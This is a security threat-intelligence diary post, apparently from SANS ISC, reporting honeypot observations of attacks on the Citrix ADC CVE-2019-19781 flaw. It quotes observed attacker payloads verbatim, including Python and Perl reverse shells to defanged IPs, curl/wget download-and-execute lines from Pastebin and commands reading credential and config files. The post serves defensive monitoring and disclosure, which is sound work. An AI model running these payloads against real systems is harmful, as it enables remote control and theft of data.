Threat Level: green Handler on Duty: Renato Marinho

SANS ISC: Internet Storm Center Internet Storm Center

Special Webcast: What you need to know about the crypt32.dll vulnerability. Register Now

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

Citrix ADC Exploits Update

Published: 2020-01-20
Last Updated: 2020-01-20 04:21:38 UTC
by Renato Marinho (Version: 1)
0 comment(s)

In today's diary, I am summarizing the current state of attacks exploiting the Citrix ADC vulnerability (CVE-2019-19781), using data from our SANS ISC honeypots. Our first two posts about this topic are here: [1] [2].

We are looking here at data collected during the first 10 days after the exploit was made public [3]. During this time, we registered more than 550,000 attack attempts to our honeypots. The highest volume was registered on Jan 12, just two days after the first exploit: 290,000 attack attempts, generated by 532 IP addresses located in 42 countries.

Take a look at the source of the attacks on the map below.

As you may have noticed, the vast majority of attacks originate from Russia. Hosts in Russia are responsible for 455,000 attempts or 82% of the total.

Histogram of Attacks by Country

Payload Overview

Regarding the payloads used by the attackers, we observed 141 variants. Given the command issued on the victim’s machine, we could infer that most of them are part of automated attacks to download and execute scripts like:

exec(\'curl+185[.]178.45.221/|+sh\');” or to simple collect data like “print+`cat+/flash/nsconfig/ns.conf`

However, we also noticed reverse connection payloads that often require attacker interaction. In those scenarios, the possibilities for the attacker are huge as they may manually interact with the system, look for interesting data and also ways to pivot to other segments on the victim’s network.

Most of the reverse connections payloads were written in Python, like this one:

/var/python/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("185[.]10.68.25",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

But a few were written in Perl:

perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"195[.]123.238.91:443");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'

We were able to connect to a couple of the endpoints via telnet and netcat. Most of these connections failed. But in some cases, we ended up with a connection and someone typing standard Unix commands like "id", "ls" and "uname". The speed suggests that these commands were typed manually. But we were not able to keep up the ruse long enough to get to any interesting commands.

The TOP 10 payloads and its respective count is shown in the table below:












(curl -fsSL https://pastebin[.]com/raw/2zds3h2T||wget -q -O -|bash; id


exec(\'cat /flash/nsconfig/ns.conf | tee /netscaler/portal/templates/yVStWwCFy9BDXBxjIGvCk3h67Gx4Zm8E.xml\');


cat /etc/passwd


/var/python/bin/python -c 'import urllib;exec(urllib.urlopen("http://185[.]178.45.221/").read())'


exec(\'whoami | tee /netscaler/portal/templates/.xml\');


(curl -s https://pastebin[.]com/raw/d3SY1erQ||wget -q -O -|bash; cat /etc/passwd



“Patching” Payload

From the list below, the fifth one caught our attention. It is especially interesting because:

  • After downloading and executing its malicious action from a Pastebin address, it applies a patch to “” file – possible to avoid competitors;
  • The Pastebin content pointed by the payload that supposedly contains the malicious action has been removed when we try to check it two days ago.

Thus, depending on when the Pastebin address with the malicious content was removed, this campaign may have just patched vulnerable installations. It’s worthing mentioning that the fix applied by this payload is partial and does not patch all possible vulnerable files.



            In the figure below it’s possible to see the moment the “patching” payload reached our honeypots.

We will continue to monitor Citrix ADC exploitations and giving you more updates. If you saw something else interesting about this vulnerability, please let us know!



Renato Marinho
Morphus Labs| LinkedIn|Twitter

0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Summing up CVE-2020-0601, or the Let?s Decrypt vulnerability
Jan 17th 2020
3 days ago by Bojan (0 comments)

CVE-2020-0601 Followup
Jan 16th 2020
4 days ago by Johannes (0 comments)

Picks of 2019 malware - the large, the small and the one full of null bytes
Jan 16th 2020
4 days ago by Jan (0 comments)

Microsoft Patch Tuesday for January 2020
Jan 14th 2020
6 days ago by Johannes (0 comments)

Citrix ADC Exploits: Overview of Observed Payloads
Jan 13th 2020
1 week ago by DidierStevens (0 comments)

View All Diaries →

Latest Discussions

Zip password recovery
created Jan 17th 2020
3 days ago by Anonymous (0 replies)

Strange Google-ish domain name lookups after update to Android 10
created Dec 21st 2019
1 month ago by jauntysankey (0 replies)

SANS IP data inconsistency
created Dec 14th 2019
1 month ago by phbits (0 replies)

Are SANS ISC InfoSec News RSS Feed broken?
created Dec 11th 2019
1 month ago by Rumahpods (0 replies)

"slow" half open tests (preparation for attacks?)
created Oct 28th 2019
2 months ago by Anonymous (0 replies)

View All Forums →

Latest News

Top Diaries

An infection from Rig exploit kit
Jun 17th 2019
7 months ago by Brad (0 comments)

Wide-scale Petya variant ransomware attack noted
Jun 27th 2017
2 years ago by Brad (0 comments)

Using a Raspberry Pi honeypot to contribute data to DShield/ISC
Aug 3rd 2017
2 years ago by Johannes (0 comments)

Second Google Chrome Extension Banker Malware in Two Weeks
Aug 29th 2017
2 years ago by Renato (0 comments)

Detection Lab: Visibility & Introspection for Defenders
Dec 15th 2017
2 years ago by Russ McRee (0 comments)